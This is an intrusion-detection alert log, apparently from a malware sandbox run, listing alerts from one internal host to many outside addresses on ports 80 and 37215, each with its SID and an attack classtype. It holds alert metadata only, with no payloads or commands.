      Timestamp:192.168.2.23175.178.225.17141804802025883 01/26/24-15:32:40.067308
      SID:2025883
      Source Port:41804
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23153.121.71.21649318802030092 01/26/24-15:32:48.060193
      SID:2030092
      Source Port:49318
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23195.22.248.21839446802030092 01/26/24-15:32:28.382250
      SID:2030092
      Source Port:39446
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.77.139.5636632372152829579 01/26/24-15:32:52.336505
      SID:2829579
      Source Port:36632
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23173.95.53.15444912802030092 01/26/24-15:31:47.666291
      SID:2030092
      Source Port:44912
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.232.20.93.937890802030092 01/26/24-15:31:58.816455
      SID:2030092
      Source Port:37890
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.23.188.5536380802025883 01/26/24-15:31:13.988644
      SID:2025883
      Source Port:36380
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.50.76.15939824802030092 01/26/24-15:31:35.677291
      SID:2030092
      Source Port:39824
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23194.47.64.1758918802030092 01/26/24-15:31:47.772871
      SID:2030092
      Source Port:58918
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23197.246.45.20139958372152835222 01/26/24-15:32:11.998768
      SID:2835222
      Source Port:39958
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.2381.150.7.20744056802025883 01/26/24-15:32:23.587676
      SID:2025883
      Source Port:44056
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.121.1541622372152835222 01/26/24-15:31:47.813013
      SID:2835222
      Source Port:41622
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23104.22.63.14333402802025883 01/26/24-15:31:55.603784
      SID:2025883
      Source Port:33402
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.238.84.5248178802030092 01/26/24-15:32:08.099021
      SID:2030092
      Source Port:48178
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.231.232.247.1541192802025883 01/26/24-15:32:50.921301
      SID:2025883
      Source Port:41192
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23120.53.232.13745522802030092 01/26/24-15:32:21.724705
      SID:2030092
      Source Port:45522
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23196.51.30.12260800802025883 01/26/24-15:31:32.888328
      SID:2025883
      Source Port:60800
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23168.76.22.16955064802025883 01/26/24-15:31:22.829928
      SID:2025883
      Source Port:55064
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23190.102.101.20333268802025883 01/26/24-15:32:28.469184
      SID:2025883
      Source Port:33268
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23192.169.179.3658894802030092 01/26/24-15:31:27.638300
      SID:2030092
      Source Port:58894
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.107.147.5552544802030092 01/26/24-15:32:01.807428
      SID:2030092
      Source Port:52544
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.232.21.34.9438766802025883 01/26/24-15:32:11.844043
      SID:2025883
      Source Port:38766
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2370.122.67.9741000802025883 01/26/24-15:33:00.440639
      SID:2025883
      Source Port:41000
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.208.206.14256540802030092 01/26/24-15:32:25.566003
      SID:2030092
      Source Port:56540
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.214.19.21236398802030092 01/26/24-15:32:58.676170
      SID:2030092
      Source Port:36398
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.196.168.19136054802030092 01/26/24-15:32:53.430651
      SID:2030092
      Source Port:36054
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.88.0.21156950802025883 01/26/24-15:32:48.719029
      SID:2025883
      Source Port:56950
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.211.159.19633108802025883 01/26/24-15:31:53.309815
      SID:2025883
      Source Port:33108
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.32.123.22959494802025883 01/26/24-15:32:36.929487
      SID:2025883
      Source Port:59494
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23167.71.50.3558148802030092 01/26/24-15:31:58.714447
      SID:2030092
      Source Port:58148
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23192.249.112.17734900802025883 01/26/24-15:31:35.552555
      SID:2025883
      Source Port:34900
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2396.7.144.13155714802030092 01/26/24-15:31:17.001022
      SID:2030092
      Source Port:55714
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.49.35.10336988802030092 01/26/24-15:32:28.348521
      SID:2030092
      Source Port:36988
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2393.63.84.18940706802030092 01/26/24-15:32:21.603095
      SID:2030092
      Source Port:40706
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2343.140.208.18834050802030092 01/26/24-15:32:22.048780
      SID:2030092
      Source Port:34050
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.241.71.5842036372152829579 01/26/24-15:32:57.468846
      SID:2829579
      Source Port:42036
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23156.241.15.8642302372152829579 01/26/24-15:33:01.150691
      SID:2829579
      Source Port:42302
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23179.53.181.4856590802030092 01/26/24-15:32:09.544723
      SID:2030092
      Source Port:56590
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23104.71.251.9738056802030092 01/26/24-15:32:07.600425
      SID:2030092
      Source Port:38056
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2361.238.90.22750688802025883 01/26/24-15:31:17.092095
      SID:2025883
      Source Port:50688
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2361.195.145.6556272802025883 01/26/24-15:32:21.950680
      SID:2025883
      Source Port:56272
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23162.0.233.13637134802030092 01/26/24-15:32:23.725294
      SID:2030092
      Source Port:37134
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23110.88.128.18545170802030092 01/26/24-15:32:30.780797
      SID:2030092
      Source Port:45170
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23121.29.56.20453294802025883 01/26/24-15:31:35.873163
      SID:2025883
      Source Port:53294
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.19.112.20358058802025883 01/26/24-15:31:58.717861
      SID:2025883
      Source Port:58058
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23216.98.4.17555762802025883 01/26/24-15:32:09.658201
      SID:2025883
      Source Port:55762
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23134.236.63.4959052802025883 01/26/24-15:32:12.175744
      SID:2025883
      Source Port:59052
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23130.237.20.5237106802030092 01/26/24-15:31:30.884005
      SID:2030092
      Source Port:37106
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2394.255.246.23957434802030092 01/26/24-15:32:18.340341
      SID:2030092
      Source Port:57434
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2383.4.148.19847134802025883 01/26/24-15:32:36.974292
      SID:2025883
      Source Port:47134
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23211.22.125.12247490802030092 01/26/24-15:33:00.860742
      SID:2030092
      Source Port:47490
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23167.82.11.16647000802030092 01/26/24-15:31:18.051241
      SID:2030092
      Source Port:47000
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.42.163.15553414802030092 01/26/24-15:32:42.803741
      SID:2030092
      Source Port:53414
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23147.46.85.25539674802030092 01/26/24-15:32:04.696625
      SID:2030092
      Source Port:39674
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23100.27.4.9836268802025883 01/26/24-15:32:12.669266
      SID:2025883
      Source Port:36268
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.198.182.19860782802025883 01/26/24-15:32:21.578212
      SID:2025883
      Source Port:60782
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.128.234.233140802025883 01/26/24-15:31:41.689715
      SID:2025883
      Source Port:33140
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2318.154.51.16553824802025883 01/26/24-15:31:13.820473
      SID:2025883
      Source Port:53824
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.45.103.6455502802025883 01/26/24-15:31:41.714509
      SID:2025883
      Source Port:55502
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2345.120.178.15140836802030092 01/26/24-15:32:50.723140
      SID:2030092
      Source Port:40836
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23212.108.44.17052582802030092 01/26/24-15:32:25.494020
      SID:2030092
      Source Port:52582
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2335.197.22.6754360802030092 01/26/24-15:32:56.785126
      SID:2030092
      Source Port:54360
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.68.30.18244318802025883 01/26/24-15:31:44.329313
      SID:2025883
      Source Port:44318
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2338.177.55.13441246802025883 01/26/24-15:32:22.560237
      SID:2025883
      Source Port:41246
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2335.177.178.23848922802025883 01/26/24-15:31:52.755301
      SID:2025883
      Source Port:48922
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23174.129.134.13157028802030092 01/26/24-15:32:18.241039
      SID:2030092
      Source Port:57028
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23172.66.135.15451118802025883 01/26/24-15:32:14.830379
      SID:2025883
      Source Port:51118
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.8.146.16960426802030092 01/26/24-15:31:19.034784
      SID:2030092
      Source Port:60426
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23119.45.129.20653062802030092 01/26/24-15:32:23.703500
      SID:2030092
      Source Port:53062
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23219.251.84.17336000802030092 01/26/24-15:32:33.033787
      SID:2030092
      Source Port:36000
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23163.5.154.2347448802030092 01/26/24-15:31:49.533515
      SID:2030092
      Source Port:47448
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.242.156.19355956802030092 01/26/24-15:31:30.666540
      SID:2030092
      Source Port:55956
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23210.76.76.6951262802030092 01/26/24-15:31:20.732075
      SID:2030092
      Source Port:51262
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2367.7.139.18651592802025883 01/26/24-15:31:44.584489
      SID:2025883
      Source Port:51592
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2365.25.201.9034906802025883 01/26/24-15:31:49.478185
      SID:2025883
      Source Port:34906
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23138.68.44.23233814802025883 01/26/24-15:31:52.709758
      SID:2025883
      Source Port:33814
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23184.51.99.17551534802030092 01/26/24-15:32:37.067103
      SID:2030092
      Source Port:51534
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.226.190.7859202802025883 01/26/24-15:32:01.354131
      SID:2025883
      Source Port:59202
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2366.251.154.22433574802025883 01/26/24-15:32:50.968261
      SID:2025883
      Source Port:33574
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.232.23.6.5060212802025883 01/26/24-15:31:26.851705
      SID:2025883
      Source Port:60212
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23160.124.107.20050914802030092 01/26/24-15:32:58.726118
      SID:2030092
      Source Port:50914
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23204.174.66.8939856802025883 01/26/24-15:31:43.968492
      SID:2025883
      Source Port:39856
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.215.23.3059722802030092 01/26/24-15:31:44.065852
      SID:2030092
      Source Port:59722
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23164.46.69.6043902802030092 01/26/24-15:31:55.641850
      SID:2030092
      Source Port:43902
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23117.20.106.5755902802030092 01/26/24-15:31:26.892259
      SID:2030092
      Source Port:55902
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23103.51.145.5143612802030092 01/26/24-15:31:43.888363
      SID:2030092
      Source Port:43612
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23202.40.219.19959744802025883 01/26/24-15:31:47.532173
      SID:2025883
      Source Port:59744
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23187.192.184.22845978802025883 01/26/24-15:32:18.308942
      SID:2025883
      Source Port:45978
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23121.67.77.25041980802025883 01/26/24-15:32:33.043388
      SID:2025883
      Source Port:41980
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2354.157.101.12738484802030092 01/26/24-15:32:53.420753
      SID:2030092
      Source Port:38484
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.85.94.24653286802025883 01/26/24-15:31:13.711293
      SID:2025883
      Source Port:53286
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23108.156.251.23339180802025883 01/26/24-15:32:21.585684
      SID:2025883
      Source Port:39180
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2377.79.225.8552098802025883 01/26/24-15:32:53.764720
      SID:2025883
      Source Port:52098
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23181.117.207.4133702802025883 01/26/24-15:32:42.866946
      SID:2025883
      Source Port:33702
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23172.255.248.15041094802025883 01/26/24-15:33:01.959349
      SID:2025883
      Source Port:41094
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.92.244.18134746802025883 01/26/24-15:31:36.457097
      SID:2025883
      Source Port:34746
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23159.223.194.13638908802030092 01/26/24-15:31:49.498703
      SID:2030092
      Source Port:38908
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2320.4.150.15357706802030092 01/26/24-15:32:01.649352
      SID:2030092
      Source Port:57706
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2313.245.236.18635174802030092 01/26/24-15:31:33.077577
      SID:2030092
      Source Port:35174
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23148.139.122.14443836802025883 01/26/24-15:31:43.859827
      SID:2025883
      Source Port:43836
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.16.167.22043164802025883 01/26/24-15:31:52.881132
      SID:2025883
      Source Port:43164
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2363.32.147.23747406802030092 01/26/24-15:32:33.778960
      SID:2030092
      Source Port:47406
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.254.80.7051952372152835222 01/26/24-15:31:47.724803
      SID:2835222
      Source Port:51952
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.235.152.238.536550802025883 01/26/24-15:32:07.844825
      SID:2025883
      Source Port:36550
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23104.107.160.19948622802025883 01/26/24-15:31:52.877494
      SID:2025883
      Source Port:48622
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23144.196.51.22148752802025883 01/26/24-15:31:36.579593
      SID:2025883
      Source Port:48752
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23154.81.106.11046190802030092 01/26/24-15:32:35.690212
      SID:2030092
      Source Port:46190
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2318.194.17.17646016802030092 01/26/24-15:31:41.778567
      SID:2030092
      Source Port:46016
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23194.164.49.7760720802030092 01/26/24-15:32:58.944458
      SID:2030092
      Source Port:60720
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23212.51.159.2051022802030092 01/26/24-15:31:49.555601
      SID:2030092
      Source Port:51022
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.232.21.165.21938134802025883 01/26/24-15:31:12.259896
      SID:2025883
      Source Port:38134
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23212.76.114.21245362802025883 01/26/24-15:31:26.866788
      SID:2025883
      Source Port:45362
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2377.70.177.5053098802030092 01/26/24-15:31:41.363987
      SID:2030092
      Source Port:53098
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2369.90.160.25452410802025883 01/26/24-15:31:23.708076
      SID:2025883
      Source Port:52410
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23156.241.13.3739998372152835222 01/26/24-15:32:46.480373
      SID:2835222
      Source Port:39998
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23202.143.87.21234310802025883 01/26/24-15:32:53.578197
      SID:2025883
      Source Port:34310
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2313.35.117.24748038802025883 01/26/24-15:31:01.184559
      SID:2025883
      Source Port:48038
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2327.74.199.24149786802025883 01/26/24-15:32:36.350234
      SID:2025883
      Source Port:49786
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.235.205.3858374802025883 01/26/24-15:31:12.588509
      SID:2025883
      Source Port:58374
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2349.4.64.19534308802030092 01/26/24-15:32:47.774923
      SID:2030092
      Source Port:34308
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.224.143.2355066802025883 01/26/24-15:32:18.476218
      SID:2025883
      Source Port:55066
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23102.219.77.14835116802030092 01/26/24-15:32:02.052414
      SID:2030092
      Source Port:35116
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23186.39.102.20842590802025883 01/26/24-15:32:18.363395
      SID:2025883
      Source Port:42590
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23185.16.89.24148104802025883 01/26/24-15:32:01.351918
      SID:2025883
      Source Port:48104
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23101.33.8.22849264802025883 01/26/24-15:32:14.795065
      SID:2025883
      Source Port:49264
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.240.179.11142334802030092 01/26/24-15:32:04.835960
      SID:2030092
      Source Port:42334
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2346.21.77.21937442802030092 01/26/24-15:32:42.019949
      SID:2030092
      Source Port:37442
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2380.211.121.12436946802025883 01/26/24-15:31:44.072128
      SID:2025883
      Source Port:36946
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2320.157.170.4946164802030092 01/26/24-15:31:18.152180
      SID:2030092
      Source Port:46164
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23184.94.157.20458528802030092 01/26/24-15:32:30.542967
      SID:2030092
      Source Port:58528
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2388.221.30.22749674802030092 01/26/24-15:32:47.925102
      SID:2030092
      Source Port:49674
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2347.135.166.18335540802025883 01/26/24-15:31:52.672906
      SID:2025883
      Source Port:35540
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23146.148.208.21340780802030092 01/26/24-15:31:43.740162
      SID:2030092
      Source Port:40780
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.59.184.24640766802030092 01/26/24-15:31:53.132854
      SID:2030092
      Source Port:40766
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23108.157.169.2641948802025883 01/26/24-15:31:01.192186
      SID:2025883
      Source Port:41948
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2394.123.190.4158916802030092 01/26/24-15:32:44.993645
      SID:2030092
      Source Port:58916
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.207.85.2538660802030092 01/26/24-15:31:36.980434
      SID:2030092
      Source Port:38660
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2323.15.47.8338132802030092 01/26/24-15:32:28.552407
      SID:2030092
      Source Port:38132
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23156.224.13.5541862372152829579 01/26/24-15:33:01.135581
      SID:2829579
      Source Port:41862
      Destination Port:37215
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.2.23207.58.183.942880802025883 01/26/24-15:31:01.067805
      SID:2025883
      Source Port:42880
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2323.194.56.7436204802030092 01/26/24-15:32:14.932098
      SID:2030092
      Source Port:36204
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2352.56.104.8535924802025883 01/26/24-15:32:41.945134
      SID:2025883
      Source Port:35924
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23192.169.174.23060688802025883 01/26/24-15:31:01.265787
      SID:2025883
      Source Port:60688
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23223.119.221.2845936802030092 01/26/24-15:32:42.152481
      SID:2030092
      Source Port:45936
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23139.9.139.4446194802025883 01/26/24-15:31:53.004488
      SID:2025883
      Source Port:46194
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23162.144.71.10436660802025883 01/26/24-15:32:04.770717
      SID:2025883
      Source Port:36660
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2335.247.250.10957112802025883 01/26/24-15:31:01.808664
      SID:2025883
      Source Port:57112
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2352.26.29.20958962802025883 01/26/24-15:32:32.545697
      SID:2025883
      Source Port:58962
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23198.1.91.2538456802025883 01/26/24-15:32:06.600510
      SID:2025883
      Source Port:38456
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.238.130.31.21353132802025883 01/26/24-15:31:51.441434
      SID:2025883
      Source Port:53132
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.23107.148.114.6555240802030092 01/26/24-15:31:18.915143
      SID:2030092
      Source Port:55240
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2341.111.206.21744778802030092 01/26/24-15:31:53.908579
      SID:2030092
      Source Port:44778
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.2334.160.251.13143950802030092 01/26/24-15:32:36.823697
      SID:2030092
      Source Port:43950
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
      Timestamp:192.168.2.23212.107.17.5343562802025883 01/26/24-15:31:20.948534
      SID:2025883
      Source Port:43562
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2374.126.94.2437582802025883 01/26/24-15:31:51.555751
      SID:2025883
      Source Port:37582
      Destination Port:80
      Protocol:TCP
      Classtype:Attempted Administrator Privilege Gain
      Timestamp:192.168.2.2392.204.202.2359382802030092 01/26/24-15:32:18.333463
      SID:2030092
      Source Port:59382
      Destination Port:80
      Protocol:TCP
      Classtype:Web Application Attack
